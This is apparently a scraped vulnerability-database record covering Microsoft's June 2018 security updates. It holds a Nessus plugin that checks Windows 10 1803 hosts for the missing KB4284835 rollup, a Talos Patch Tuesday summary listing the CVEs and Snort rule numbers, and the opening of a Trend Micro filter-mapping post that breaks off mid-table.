The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110487);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-0871\",\n \"CVE-2018-0978\",\n \"CVE-2018-0982\",\n \"CVE-2018-1036\",\n \"CVE-2018-1040\",\n \"CVE-2018-8110\",\n \"CVE-2018-8113\",\n \"CVE-2018-8121\",\n \"CVE-2018-8140\",\n \"CVE-2018-8169\",\n \"CVE-2018-8175\",\n \"CVE-2018-8201\",\n \"CVE-2018-8205\",\n \"CVE-2018-8207\",\n \"CVE-2018-8208\",\n \"CVE-2018-8210\",\n \"CVE-2018-8211\",\n \"CVE-2018-8212\",\n \"CVE-2018-8213\",\n \"CVE-2018-8214\",\n \"CVE-2018-8215\",\n \"CVE-2018-8219\",\n \"CVE-2018-8221\",\n \"CVE-2018-8225\",\n \"CVE-2018-8226\",\n \"CVE-2018-8227\",\n \"CVE-2018-8229\",\n \"CVE-2018-8231\",\n \"CVE-2018-8233\",\n \"CVE-2018-8234\",\n \"CVE-2018-8235\",\n \"CVE-2018-8236\",\n \"CVE-2018-8239\",\n \"CVE-2018-8251\",\n \"CVE-2018-8267\"\n );\n script_bugtraq_id(\n 104326,\n 104328,\n 104330,\n 104331,\n 104333,\n 104336,\n 104338,\n 104339,\n 104340,\n 104343,\n 104353,\n 104354,\n 104356,\n 104359,\n 104360,\n 104361,\n 104364,\n 104365,\n 104368,\n 104369,\n 104373,\n 104379,\n 104380,\n 104382,\n 104383,\n 104389,\n 104391,\n 104392,\n 104394,\n 104395,\n 104398,\n 104401,\n 104404,\n 104406,\n 104407\n );\n script_xref(name:\"MSKB\", value:\"4284835\");\n script_xref(name:\"MSFT\", value:\"MS18-4284835\");\n\n script_name(english:\"KB4284835: Windows 10 Version 1803 and Windows Server Version 1803 June 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4284835.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege 
vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2018-8169)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - A denial of service vulnerability exists when Windows\n NT WEBDAV Minirdr attempts to query a WEBDAV directory.\n An attacker who successfully exploited the vulnerability\n could cause a denial of service. (CVE-2018-8175)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the user's system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. 
(CVE-2018-8239)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2018-8121)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8211, CVE-2018-8212,\n CVE-2018-8215, CVE-2018-8221)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2018-8234)\n\n - An Elevation of Privilege vulnerability exists when\n Cortana retrieves data from user input services without\n consideration for status. An attacker who successfully\n exploited the vulnerability could execute commands with\n elevated permissions. (CVE-2018-8140)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. 
The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2018-8207)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8233)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-1036)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. 
The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8227, CVE-2018-8229)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V instruction emulation fails to properly\n enforce privilege levels. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges on a target guest operating system. The host\n operating system is not vulnerable to this attack. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, the vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerability by correcting how privileges are\n enforced by Windows Hyper-V instruction emulation.\n (CVE-2018-8219)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8110,\n CVE-2018-8236)\n\n - An information disclosure vulnerability exists when Edge\n improperly marks files. 
An attacker who successfully\n exploited this vulnerability could exfiltrate file\n contents from disk. For an attack to be successful, an\n attacker must persuade a user to open a malicious\n website. The security update addresses the vulnerability\n by properly marking files. (CVE-2018-0871)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A security feature bypass vulnerability exists in\n Internet Explorer that allows for bypassing Mark of the\n Web Tagging (MOTW). Failing to set the MOTW means that a\n large number of Microsoft security technologies are\n bypassed. (CVE-2018-8113)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. 
(CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-0982)\n\n - An elevation of privilege vulnerability exists in\n Windows when Desktop Bridge does not properly manage the\n virtual registry. An attacker who successfully exploited\n this vulnerability could run arbitrary code in kernel\n mode. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2018-8208, CVE-2018-8214)\");\n # https://support.microsoft.com/en-us/help/4284835/windows-10-update-kb4284835\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7614a17f\");\n script_set_attribute(attribute:\"solution\", value:\n \"Apply Cumulative Update KB4284835.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8231\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-06\";\nkbs = make_list('4284835');\n\n# If third-party patch-management data is available for this host, report\n# on KB4284835 from that data instead of inspecting file versions directly.\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# Only Windows 10-family hosts (kernel version 10, SP 0) are in scope.\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# Windows 10 version 1803 and Windows Server version 1803 share OS build 17134.\n# The rollup check compares installed file versions against the June 2018\n# (06_2018) cumulative-update baseline and flags a hole if KB4284835 is missing.\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"06_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4284835])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2018-07-10T22:29:40", "bulletinFamily": "blog", "cvelist": ["CVE-2018-0871", "CVE-2018-0978", "CVE-2018-0982", "CVE-2018-1036", "CVE-2018-1040", "CVE-2018-8110", "CVE-2018-8111", "CVE-2018-8113", "CVE-2018-8121", "CVE-2018-8140", "CVE-2018-8169", 
"CVE-2018-8175", "CVE-2018-8201", "CVE-2018-8205", "CVE-2018-8207", "CVE-2018-8208", "CVE-2018-8209", "CVE-2018-8210", "CVE-2018-8211", "CVE-2018-8212", "CVE-2018-8213", "CVE-2018-8214", "CVE-2018-8215", "CVE-2018-8216", "CVE-2018-8217", "CVE-2018-8218", "CVE-2018-8219", "CVE-2018-8221", "CVE-2018-8224", "CVE-2018-8225", "CVE-2018-8226", "CVE-2018-8227", "CVE-2018-8229", "CVE-2018-8231", "CVE-2018-8233", "CVE-2018-8234", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8239", "CVE-2018-8243", "CVE-2018-8244", "CVE-2018-8245", "CVE-2018-8246", "CVE-2018-8247", "CVE-2018-8248", "CVE-2018-8249", "CVE-2018-8251", "CVE-2018-8252", "CVE-2018-8254", "CVE-2018-8267"], "description": "## Executive Summary\n\n \nMicrosoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 50 flaws, with 11 of them rated \"critical,\" and 39 rated \"important.\" These vulnerabilities impact Microsoft Edge, Internet Explorer, Chakra Scripting Engine, Windows DNSAPI, Microsoft Office, Windows Kernel and more. \n \nIn addition to the 50 vulnerabilities referenced above, Microsoft has also released a critical update advisory, ADV180014, the June 2018 Adobe Flash Security Update, which addresses the vulnerabilities described in the security bulletin. \n\n\n### Critical vulnerabilities\n\n \nThis month, Microsoft is addressing 11 vulnerabilities that are rated \"critical.\" Talos believes these three vulnerabilities in particular are notable and require prompt attention. \n \n[CVE-2018-8225 - Windows DNSAPI Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8225>) \n \nA remote code vulnerability is present within Windows DNS. This vulnerability manifests due to DNSAPI.dll improperly handling DNS responses. 
This vulnerability could allow a remote attacker to execute arbitrary code within the context of the LocalSystem account on affected systems. An attacker could leverage a malicious DNS server and send specially crafted DNS responses to trigger this vulnerability. \n \n[CVE-2018-8229 - Chakra Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8229>) \n \nA remote code execution vulnerability is present within Microsoft Scripting Engine. This vulnerability manifests due to the Chakra engine improperly handling objects in memory. This vulnerability could be leveraged by attackers to execute arbitrary code on affected systems within the context of the current user. This vulnerability could be leveraged in web-based attacks where a user is convinced to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker-controlled webpage, or simply a page that hosts external content, such as advertisements. \n \n[CVE-2018-8267 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8267>) \n \nA remote code execution vulnerability is present within Microsoft Scripting Engine. This vulnerability manifests due to the scripting engine not properly handling objects in memory in Internet Explorer. This vulnerability could be leveraged by attackers to execute arbitrary code on affected systems within the context of the current user. This vulnerability was publicly disclosed prior to a patch being made available. 
\n \nOther vulnerabilities deemed \"critical\" are listed below: \n\n\n * [CVE-2018-8110 - Microsoft Edge Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8110>)\n * [CVE-2018-8111 - Microsoft Edge Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8111>)\n * [CVE-2018-8213 - Windows Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8213>)\n * [CVE-2018-8231 - HTTP Protocol Stack Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8231>)\n * [CVE-2018-8236 - Microsoft Edge Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8236>)\n * [CVE-2018-8243 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8243>)\n * [CVE-2018-8249 - Internet Explorer Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8249>)\n * [CVE-2018-8251 - Media Foundation Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8251>)\n * [CVE-2018-8267 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8267>)\n\n### Important vulnerabilities\n\n \nThis month, Microsoft is addressing 39 vulnerabilities that are rated \"important.\" One of these vulnerabilities is TALOS-2018-0545, which was assigned [CVE-2018-8210](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8210>). This vulnerability is a Windows remote code execution flaw that was discovered by Marcin Noga of Cisco Talos. 
Additional information related to this vulnerability can be found in the advisory report [here](<https://www.talosintelligence.com/reports/TALOS-2018-0545>). \n \nAdditionally, Talos believes the following vulnerability is notable and requires prompt attention. \n \n[CVE-2018-8227 - Chakra Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8227>) \n \nA remote code execution vulnerability is present within the Microsoft Scripting Engine. This vulnerability manifests due to the Chakra engine improperly handling objects in memory. This vulnerability could be leveraged by attackers to execute arbitrary code on affected systems within the context of the current user. This vulnerability could be leveraged in web-based attacks where a user is convinced to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker-controlled webpage, or simply a page that hosts external content, such as advertisements. 
\n \nOther vulnerabilities deemed \"important\" are listed below: \n\n\n * [CVE-2018-0871 - Microsoft Edge Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0871>)\n * [CVE-2018-0978 - Internet Explorer Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0978>)\n * [CVE-2018-0982 - Windows Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0982>)\n * [CVE-2018-1036 - NTFS Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1036>)\n * [CVE-2018-1040 - Windows Code Integrity Module Denial of Service Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1040>)\n * [CVE-2018-8113 - Internet Explorer Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8113>)\n * [CVE-2018-8121 - Windows Kernel Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8121>)\n * [CVE-2018-8140 - Cortana Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8140>)\n * [CVE-2018-8169 - HIDParser Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8169>)\n * [CVE-2018-8175 - WEBDAV Denial of Service Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8175>)\n * [CVE-2018-8201 - Device Guard Code Integrity Policy Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8201>)\n * [CVE-2018-8205 - Windows Denial of Service Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8205>)\n * [CVE-2018-8207 - Windows Kernel Information 
Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8207>)\n * [CVE-2018-8208 - Windows Desktop Bridge Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8208>)\n * [CVE-2018-8209 - Windows Wireless Network Profile Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8209>)\n * [CVE-2018-8210 - Windows Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8210>)\n * [CVE-2018-8211 - Device Guard Code Integrity Policy Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8211>)\n * [CVE-2018-8212 - Device Guard Code Integrity Policy Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8212>)\n * [CVE-2018-8214 - Windows Desktop Bridge Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8214>)\n * [CVE-2018-8215 - Device Guard Code Integrity Policy Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8215>)\n * [CVE-2018-8216 - Device Guard Code Integrity Policy Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8216>)\n * [CVE-2018-8217 - Device Guard Code Integrity Policy Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8217>)\n * [CVE-2018-8218 - Windows Hyper-V Denial of Service Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8218>)\n * [CVE-2018-8219 - Hypervisor Code Integrity Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8219>)\n * 
[CVE-2018-8221 - Device Guard Code Integrity Policy Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8221>)\n * [CVE-2018-8224 - Windows Kernel Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8224>)\n * [CVE-2018-8226 - HTTP.sys Denial of Service Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8226>)\n * [CVE-2018-8233 - Win32k Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8233>)\n * [CVE-2018-8234 - Microsoft Edge Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8234>)\n * [CVE-2018-8235 - Microsoft Edge Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8235>)\n * [CVE-2018-8239 - Windows GDI Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8239>)\n * [CVE-2018-8244 - Microsoft Outlook Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8244>)\n * [CVE-2018-8245 - Microsoft Office Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8245>)\n * [CVE-2018-8246 - Microsoft Excel Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8246>)\n * [CVE-2018-8247 - Microsoft Office Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8247>)\n * [CVE-2018-8248 - Microsoft Excel Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8248>)\n * [CVE-2018-8252 - Microsoft SharePoint Elevation of Privilege 
Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8252>)\n * [CVE-2018-8254 - Microsoft SharePoint Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8254>)\n\n### Coverage\n\n \nIn response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released in the future, and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org. \n \n**Snort Rules:** \n\n\n * 45628, 46927 - 46930, 46933 - 46935, 46938 - 46945, 46951 - 46958, 46961 - 46962\n", "modified": "2018-06-19T18:44:24", "published": "2018-06-12T11:58:00", "id": "TALOSBLOG:30BC73E0EDF7739A87A63A99D8A6E0D4", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/jJACfZt8sFk/ms-tuesday.html", "type": "talosblog", "title": "Microsoft Patch Tuesday - June 2018", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "trendmicroblog": [{"lastseen": "2018-06-19T08:13:49", "bulletinFamily": "blog", "cvelist": ["CVE-2018-0871", "CVE-2018-0978", "CVE-2018-0982", "CVE-2018-1036", "CVE-2018-1040", "CVE-2018-8110", "CVE-2018-8111", "CVE-2018-8113", "CVE-2018-8121", "CVE-2018-8140", "CVE-2018-8169", "CVE-2018-8175", "CVE-2018-8201", "CVE-2018-8205", "CVE-2018-8207", "CVE-2018-8208", "CVE-2018-8209", "CVE-2018-8210", "CVE-2018-8211", "CVE-2018-8212", "CVE-2018-8213", "CVE-2018-8214", "CVE-2018-8215", "CVE-2018-8216", "CVE-2018-8217", "CVE-2018-8218", "CVE-2018-8219", "CVE-2018-8221", "CVE-2018-8224", "CVE-2018-8225", "CVE-2018-8226", "CVE-2018-8227", "CVE-2018-8229", "CVE-2018-8231", "CVE-2018-8233", "CVE-2018-8234", 
"CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8239", "CVE-2018-8243", "CVE-2018-8244", "CVE-2018-8245", "CVE-2018-8246", "CVE-2018-8247", "CVE-2018-8248", "CVE-2018-8249", "CVE-2018-8251", "CVE-2018-8252", "CVE-2018-8254", "CVE-2018-8267"], "description": "\n\nAs a native Texan, I\u2019ve seen more than my fair share of bugs - actual physical bugs that love the hot, humid Texas climate and my curly hair for some reason. The Zero Day Initiative (ZDI) sees many bugs (of the software variety), including those that affect SCADA control systems. Fritz Sands recently walked through a deep dive into an attack on a remote procedure call (RPC) interface based on the proofs of concept from Advantech vulnerability submissions to ZDI. While Advantech\u2019s products focus on Internet of Things (IoT) and Industrial IoT, the use of RPC interfaces isn\u2019t limited to SCADA. Their use is more prevalent than you think. So if you want to get an understanding of RPC interfaces and hone your skills, you can go down the rabbit hole with Fritz and get the full details [here](<https://www.zerodayinitiative.com/blog/2018/6/7/down-the-rabbit-hole-a-deep-dive-into-an-attack-on-an-rpc-interface>).\n\n**Microsoft Security Updates**\n\nThis week\u2019s Digital Vaccine\u00ae (DV) package includes coverage for Microsoft updates released on or before June 12, 2018. This month, Microsoft released 50 security patches covering Internet Explorer (IE), Edge, ChakraCore, Hyper-V Server, Windows, and Microsoft Office and Office Services. Of the 50 CVEs, 11 are listed as Critical and 39 are rated Important. Five of the CVEs came through the ZDI program. The following table maps Digital Vaccine filters to the Microsoft updates. 
You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [June 2018 Security Update Review](<https://www.zerodayinitiative.com/blog/2018/6/12/the-june-2018-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2018-0871 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0978 | 32124 | \nCVE-2018-0982 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-1036 | 32162 | \nCVE-2018-1040 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8110 | 32026 | \nCVE-2018-8111 | 32027 | \nCVE-2018-8113 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8121 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8140 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8169 | 32164 | \nCVE-2018-8175 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8201 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8205 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8207 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8208 | 32126 | \nCVE-2018-8209 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8210 | 32028 | \nCVE-2018-8211 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8212 | | Vendor Deemed Reproducibility or 